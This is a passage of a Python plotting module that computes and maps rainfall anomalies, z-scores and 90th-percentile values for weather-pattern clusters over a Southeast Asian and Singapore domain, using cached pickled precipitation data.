baseline = (get_RF_calculations(model, criteria="gt50mm", calculation="mean", clus="whole"))
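# Guard against double-scaling: get_RF_calculations() already scales means by 100,
# so a max above 100 indicates a pickle stored pre-scaled (assumed unit mismatch).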
if baseline.max() > 100:
baseline = baseline/100
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
all_colors = np.vstack(plt.cm.BrBG(np.linspace(0,1,11)))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Anomaly for rainfall above 50mm, over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
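# levels1: fine steps for smooth filled shading; levels2: coarse integer ticks used
# for the contour labels and the colorbar.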
levels1 = np.linspace(-20,20,81)
levels2 = [int(i) for i in np.arange(-20, 21, 5)]
for clus in range(optimal_k):
print(f'\n{utils.time_now()}: {clus}.. ');
time.sleep(1); gc.collect()
data = get_RF_calculations(model, criteria="gt50mm", calculation="mean", clus=clus)
mean = data-baseline
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('k')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks(np.linspace(model.LON_W,model.LON_E,10), crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([int(i) for i in np.linspace(model.LON_W,model.LON_E,10)], rotation=55)
# ax_rf_plot.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
# ax_rf_plot.set_xticklabels([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([int(i) for i in np.linspace(model.LAT_S,model.LAT_N,10)], crs=ccrs.PlateCarree())
# ax_rf_plot.set_yticklabels([int(i) for i in np.linspace(model.LAT_S,model.LAT_N,10)], rotation=55)
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, mean.T,
levels1,
cmap=terrain_map,
extend='both')
conts = ax_rf_plot.contour(RF, 'w', linewidths=0)
ax_rf_plot.clabel(conts,
np.concatenate([levels2[:4],levels2[5:]]),
colors='grey', inline=True, fmt='%1.f', fontsize=7)
ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Proportion of grid with >50 mm rainfall (%) relative to whole dataset baseline', orientation='horizontal', pad=0.01,
ticks=levels2
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_heavy_gt50mm_ANOM_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def acquire_rf_subset(model, criteria, clus, location_tag):
"""
This function discerns if the dataset to be retrieved is from the whole dataset,
or from a particular cluster. If it is the former, it will be pickled so retrieval will be faster
and no need to store in-memory.
"""
print(f"{utils.time_now()} - Acquiring dataset for {criteria}{location_tag}...")
if clus == "whole":
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path).sel(
lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N))
else:
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path).sel(
lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N))
RFprec_to_ClusterLabels_dataset = RFprec_to_ClusterLabels_dataset.where(
RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True)
if location_tag == '_sgonly':
w_lim_sg = 103.5
e_lim_sg = 104.055
s_lim_sg = 1.1
n_lim_sg = 1.55
RFprec_to_ClusterLabels_dataset = RFprec_to_ClusterLabels_dataset.sel(
lon=slice(w_lim_sg, e_lim_sg),lat=slice(s_lim_sg, n_lim_sg))
elif location_tag == '_regionalonly':
w_lim_regional = 96
e_lim_regional = 111.6
s_lim_regional = -4.5
n_lim_regional = 8
RFprec_to_ClusterLabels_dataset = RFprec_to_ClusterLabels_dataset.sel(
lon=slice(w_lim_regional, e_lim_regional),lat=slice(s_lim_regional, n_lim_regional))
if criteria == 'gt1mm':
data = (RFprec_to_ClusterLabels_dataset.precipitationCal > 1).values
elif criteria == 'gt50mm':
data = (RFprec_to_ClusterLabels_dataset.precipitationCal > 50).values
elif criteria in ['90perc', '10perc']:
# Percentiles need the full time dimension, so return the DataArray itself;
# get_RF_calculations() chunks it with Dask when the domain is too large.
return RFprec_to_ClusterLabels_dataset.precipitationCal
elif criteria == 'rf_ds_lon':
data = RFprec_to_ClusterLabels_dataset.lon
elif criteria == 'rf_ds_lat':
data = RFprec_to_ClusterLabels_dataset.lat
return data
def get_RF_calculations(model, criteria, calculation=None, clus="whole", too_large=None,
sgonly=False, regionalonly=False):
"""
BREAK DOWN DATA FROM CALCULATION!
or really just go pickle
"""
print(f'{utils.time_now()} - Criteria: {criteria}, calculation: {calculation}, clus: {clus}, sgonly: {sgonly}, regionalonly: {regionalonly}')
# pickling the entire dataset which is what z-score will be calculated against
if sgonly: location_tag = '_sgonly'
elif regionalonly: location_tag = '_regionalonly'
else: location_tag = ''
found = utils.find(f"{criteria}_serialized_{clus}{location_tag}.pkl", model.cluster_dir)
if found: found = found[0]
else:
# Each subset (whole-dataset or cluster-wise) is pickled so these arrays need not
# be held in memory; later calls simply open the pickles lazily when needed.
print(f'"{criteria}_serialized_{clus}{location_tag}.pkl" not found.')
found = acquire_rf_subset(model, criteria, clus, location_tag)
utils.to_pickle(f"{criteria}_serialized_{clus}{location_tag}", found, model.cluster_dir)
if isinstance(found, str):
pkl = utils.open_pickle(found)
else: pkl = found # when retrieved cluster-wise this is the in-memory array, not a pickle path
if calculation == "mean" and len(pkl.shape) >2:
daskarr = da.from_array(pkl, chunks=(500, pkl.shape[1], pkl.shape[2]))
return daskarr.mean(axis=0).compute() *100
elif calculation == "std" and len(pkl.shape) >2:
daskarr = da.from_array(pkl, chunks=(500, pkl.shape[1], pkl.shape[2]))
return daskarr.std(axis=0).compute() *100
elif calculation == "90perc" and len(pkl.shape) >2:
if too_large:
pkl = pkl.chunk({'time':-1, 'lon':2, 'lat':2})
return pkl.quantile(0.9, dim='time').persist().values
else:
return np.percentile(pkl.values, 90, axis=0)
elif calculation == "10perc" and len(pkl.shape) >2:
if too_large:
pkl = pkl.chunk({'time':-1, 'lon':2, 'lat':2})
return pkl.quantile(0.1, dim='time').persist().values
else:
return np.percentile(pkl.values, 10, axis=0)
else:  # e.g. rf_ds_lon and rf_ds_lat pass calculation=None
return pkl
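# --- Illustrative sketch (hypothetical helper mirroring the call pattern of the ANOM
# plots above): a cluster anomaly is just the cached cluster mean minus the cached
# whole-dataset baseline, both retrieved through get_RF_calculations().
def _demo_cluster_anomaly(model, clus):
    """Anomaly (%) of wet-day probability for one cluster vs the whole dataset."""
    baseline = get_RF_calculations(model, criteria="gt1mm", calculation="mean", clus="whole")
    clus_mean = get_RF_calculations(model, criteria="gt1mm", calculation="mean", clus=clus)
    return clus_mean - baseline  # positive values => wetter than the baseline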
def print_rf_gt1mm_zscore(model, dest, optimal_k, too_large):
"""
Adopting the zscore plot from gt50mm for gt1mm
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting zscores of >1mm rainfall now.\nTotal of {optimal_k} clusters.')
two58_to_196 = plt.cm.gist_ncar(np.linspace(.75, .8, 3))
one96_to_0 = plt.cm.PuOr(np.linspace(0, 0.5, 4))
zero_to_196 = plt.cm.twilight(np.linspace(0, .4, 4))
one96_to_258 = plt.cm.gist_rainbow(np.linspace(.55, .3, 3))
all_colors = np.vstack((two58_to_196, one96_to_0, zero_to_196, one96_to_258))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
levels=np.linspace(-3, 3, 39)
ticks= [-2.58, -1.96, -1.65, -.67, .67, 1.65, 1.96, 2.58]
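# The stitched colormap bands and the tick values correspond to two-tailed standard
# normal thresholds: |Z|<=0.67 ~ 50%, <=1.65 ~ 90%, <=1.96 ~ 95%, <=2.58 ~ 99%.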
std = get_RF_calculations(model, criteria="gt1mm", calculation="std")
mean = get_RF_calculations(model, criteria="gt1mm", calculation="mean")
rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon")
rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat")
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
fig.suptitle(f'Z-scores for rainfall above 1mm, over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E. '\
f"Contour lines (in red) are drawn to indicate:\n-0.67<=Z<=0.67 == 50%, -1.65<=Z<=1.65 == 90%\n-1.96<=Z<=1.96 == 95%, -2.58<=Z<=2.58 == 99%", fontweight='bold')
for clus in range(optimal_k):
print(f'{utils.time_now()} - Plotting for cluster {clus+1}')
clus_proba_gt1mm = get_RF_calculations(model, criteria="gt1mm", calculation="mean", clus=clus)
zscore = ((clus_proba_gt1mm-mean)/std)
zscore = np.nan_to_num(zscore)
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.set_title(f"Cluster {clus+1}")
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.round(i,0) for i in np.linspace(model.LON_W,model.LON_E,9)], crs=ccrs.PlateCarree())
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([int(i) for i in np.linspace(model.LAT_S,model.LAT_N,10)], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, zscore.T,
levels,
cmap=terrain_map,
extend='both')
conts = ax_rf_plot.contour(RF, linewidths=0.15,
levels=ticks,
colors=('r',),linestyles=('-.',))
ax_rf_plot.clabel(conts, conts.levels, colors='k',
inline=True, fmt='%1.2f', fontsize=10)
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, ticks=[-2.58, -1.96, -1.65, -.67, 0, .67, 1.65, 1.96, 2.58], label='Zscore compared to baseline',
orientation='horizontal', pad=0.01,
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_rainday_gt1mm_zscores_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
def print_rf_heavy_gt50mm_zscore(model, dest, optimal_k, too_large):
"""
Unlike gt1mm, gt50mm is only in very small percentages, hence it's useful to bypass the issue of the 0-1% range
and simply use population mean and std to calculate z-scores of each cluster.
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting zscores of >50mm rainfall now.\nTotal of {optimal_k} clusters.')
two58_to_196 = plt.cm.gist_ncar(np.linspace(.75, .8, 3))
one96_to_0 = plt.cm.PuOr(np.linspace(0, 0.5, 4))
zero_to_196 = plt.cm.twilight(np.linspace(0, .4, 4))
one96_to_258 = plt.cm.gist_rainbow(np.linspace(.55, .3, 3))
all_colors = np.vstack((two58_to_196, one96_to_0, zero_to_196, one96_to_258))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
levels=np.linspace(-3, 3, 39)
ticks= [-2.58, -1.96, -1.65, -.67, .67, 1.65, 1.96, 2.58]
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon")
rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat")
fig.suptitle(f'Z-scores for rainfall above 50mm, over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E. '\
f"Contour lines (in yellow) are drawn to indicate:\n-0.67<=Z<=0.67 == 50%, -1.65<=Z<=1.65 == 90%\n-1.96<=Z<=1.96 == 95%, -2.58<=Z<=2.58 == 99%", fontweight='bold')
std = get_RF_calculations(model, criteria="gt50mm", calculation="std")
mean = get_RF_calculations(model, criteria="gt50mm", calculation="mean")
rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon")
rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat")
for clus in range(optimal_k):
print(f'{utils.time_now()} - Plotting cluster {clus+1} now')
clus_proba_gt50mm = get_RF_calculations(model, criteria="gt50mm", calculation="mean", clus=clus)
zscore = ((clus_proba_gt50mm-mean)/std)
zscore = np.nan_to_num(zscore)
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.set_title(f"Cluster {clus+1}")
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.round(i,0) for i in np.linspace(model.LON_W,model.LON_E,9)], crs=ccrs.PlateCarree())
#ax_rf_plot.set_xticklabels([int(i) for i in np.linspace(model.LON_W,model.LON_E,10)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([int(i) for i in np.linspace(model.LAT_S,model.LAT_N,10)], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, zscore.T,
levels,
cmap=terrain_map,
extend='both')
conts = ax_rf_plot.contour(RF, linewidths=0.15,
levels=ticks,
colors=('y',),linestyles=('-.',))
ax_rf_plot.clabel(conts, conts.levels, colors='k',
inline=True, fmt='%1.2f', fontsize=10)
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, ticks=[-2.58, -1.96, -1.65, -.67, 0, .67, 1.65, 1.96, 2.58],
label='Zscore compared to baseline',
orientation='horizontal', pad=0.01,
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_heavy_gt50mm_zscores_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_heavy_gt50mm_SGonly_zscore(model, dest, optimal_k, too_large):
"""
Added in 29 Mar
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting zscores of >50mm rainfall now (SG-only).\nTotal of {optimal_k} clusters.')
two58_to_196 = plt.cm.gist_ncar(np.linspace(.75, .8, 30))
one96_to_0 = plt.cm.PuOr(np.linspace(0, 0.5, 40))
zero_to_196 = plt.cm.twilight(np.linspace(0, .4, 40))
one96_to_258 = plt.cm.gist_rainbow(np.linspace(.55, .3, 30))
all_colors = np.vstack((two58_to_196, one96_to_0, zero_to_196, one96_to_258))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
levels = [np.round(i, 2) for i in np.linspace(-3, 3, 215)]
ticks= [-2.58, -1.96, -1.65, -.67, .67, 1.65, 1.96, 2.58]
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon", sgonly=True)
rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat", sgonly=True)
fig.suptitle(f'Z-scores for rainfall above 50mm, over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E. '\
f"Contour lines (in yellow) are drawn to indicate:\n-0.67<=Z<=0.67 == 50%, -1.65<=Z<=1.65 == 90%\n-1.96<=Z<=1.96 == 95%, -2.58<=Z<=2.58 == 99%", fontweight='bold')
w = rf_ds_lon.min().values
e = rf_ds_lon.max().values
s = rf_ds_lat.min().values
n = rf_ds_lat.max().values
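# Plot extent comes from the SG-only subset's own coordinates rather than the full
# model domain.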
std = get_RF_calculations(model, criteria="gt50mm", calculation="std", sgonly=True)
mean = get_RF_calculations(model, criteria="gt50mm", calculation="mean", sgonly=True)
for clus in range(optimal_k):
print(f'{utils.time_now()} - Plotting cluster {clus+1} now')
clus_proba_gt50mm = get_RF_calculations(model, criteria="gt50mm", calculation="mean", clus=clus, sgonly=True)
zscore = ((clus_proba_gt50mm-mean)/std)
zscore = np.nan_to_num(zscore)
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.set_title(f"Cluster {clus+1}")
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([w, e, s, n])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.ceil(w), np.floor(e)], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([np.ceil(w), np.floor(e)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, zscore.T,
levels,
cmap=terrain_map,
extend='both')
conts = ax_rf_plot.contour(RF, linewidths=0.15,
levels=ticks,
colors=('y',),linestyles=('-.',))
ax_rf_plot.clabel(conts, conts.levels, colors='k',
inline=True, fmt='%1.2f', fontsize=10)
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, ticks=[-2.58, -1.96, -1.65, -.67, 0, .67, 1.65, 1.96, 2.58],
label='Zscore compared to baseline',
orientation='horizontal', pad=0.01,
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_heavy_gt50mm_SGonly_zscores_v3_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_heavy_gt1mm_SGonly_zscore(model, dest, optimal_k, too_large):
"""
Added in 7 Apr
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting zscores of >1mm rainfall now (SG-only).\nTotal of {optimal_k} clusters.')
two58_to_196 = plt.cm.gist_ncar(np.linspace(.75, .8, 30))
one96_to_0 = plt.cm.PuOr(np.linspace(0, 0.5, 40))
zero_to_196 = plt.cm.twilight(np.linspace(0, .4, 40))
one96_to_258 = plt.cm.gist_rainbow(np.linspace(.55, .3, 30))
all_colors = np.vstack((two58_to_196, one96_to_0, zero_to_196, one96_to_258))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
levels = [np.round(i, 2) for i in np.linspace(-3, 3, 215)]
ticks= [-2.58, -1.96, -1.65, -.67, .67, 1.65, 1.96, 2.58]
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon", sgonly=True)
rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat", sgonly=True)
fig.suptitle(f'Z-scores for rainfall above 1mm, over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E. '\
f"Contour lines (in yellow) are drawn to indicate:\n-0.67<=Z<=0.67 == 50%, -1.65<=Z<=1.65 == 90%\n-1.96<=Z<=1.96 == 95%, -2.58<=Z<=2.58 == 99%", fontweight='bold')
w = rf_ds_lon.min().values
e = rf_ds_lon.max().values
s = rf_ds_lat.min().values
n = rf_ds_lat.max().values
std = get_RF_calculations(model, criteria="gt1mm", calculation="std", sgonly=True)
mean = get_RF_calculations(model, criteria="gt1mm", calculation="mean", sgonly=True)
for clus in range(optimal_k):
print(f'{utils.time_now()} - Plotting cluster {clus+1} now')
clus_proba_gt1mm = get_RF_calculations(model, criteria="gt1mm", calculation="mean", clus=clus, sgonly=True)
zscore = ((clus_proba_gt1mm-mean)/std)
zscore = np.nan_to_num(zscore)
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.set_title(f"Cluster {clus+1}")
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([w, e, s, n])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.ceil(w), np.floor(e)], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([np.ceil(w), np.floor(e)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, zscore.T,
levels,
cmap=terrain_map,
extend='both')
conts = ax_rf_plot.contour(RF, linewidths=0.15,
levels=ticks,
colors=('y',),linestyles=('-.',))
ax_rf_plot.clabel(conts, conts.levels, colors='k',
inline=True, fmt='%1.2f', fontsize=10)
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, ticks=[-2.58, -1.96, -1.65, -.67, 0, .67, 1.65, 1.96, 2.58],
label='Zscore compared to baseline',
orientation='horizontal', pad=0.01,
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_rainday_gt1mm_SGonly_zscores_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_90th_percentile_ANOM_plots(model, dest, optimal_k, too_large):
"""
i.e. taking the values but subtracting the baseline
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting 90th-perc rainfall now.\nTotal of {optimal_k} clusters.')
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
baseline = get_RF_calculations(model, criteria="90perc", calculation="90perc")
print('Baseline calculated')
rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon")
rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat")
all_colors = np.vstack(plt.cm.terrain_r(np.linspace(0,1,11)))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Anomaly for 90th percentile RF over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
levels = [int(i) for i in np.linspace(-100,100,21)]
for clus in range(optimal_k):
print(f'{utils.time_now()}: Cluster {clus} now.. ')
time.sleep(1); gc.collect()
mean = get_RF_calculations(model, criteria="90perc", calculation="90perc", clus=clus, too_large=too_large)
mean = mean-baseline
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks(np.linspace(model.LON_W,model.LON_E,10), crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([int(i) for i in np.linspace(model.LON_W,model.LON_E,10)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([int(i) for i in np.linspace(model.LAT_S,model.LAT_N,10)], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, mean.T,
levels,
cmap=terrain_map,
extend='neither')
conts = ax_rf_plot.contour(RF, 'w', linewidths=0)
ax_rf_plot.clabel(conts, conts.levels, colors='k', inline=True, fmt='%1.f', fontsize=8)
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, ticks=levels,
label='Anomaly of 90th percentile RF (in mm) relative to baseline.', orientation='horizontal', pad=0.01)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_90th_percentile_ANOM_v1_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
def print_rf_90th_percentile_SGonly_ANOM_plots(model, dest, optimal_k):
"""
i.e. taking the values but subtracting the baseline
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting 90th-perc rainfall over SG now.\nTotal of {optimal_k} clusters, now printing cluster: ')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
w_lim_sg = 103.5
e_lim_sg = 104.055
s_lim_sg = 1.1
n_lim_sg = 1.55
RFprec_to_ClusterLabels_dataset = RFprec_to_ClusterLabels_dataset.sel(lon=slice(w_lim_sg, e_lim_sg),lat=slice(s_lim_sg, n_lim_sg))
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
w = rf_ds_lon.min().values
e = rf_ds_lon.max().values
s = rf_ds_lat.min().values
n = rf_ds_lat.max().values
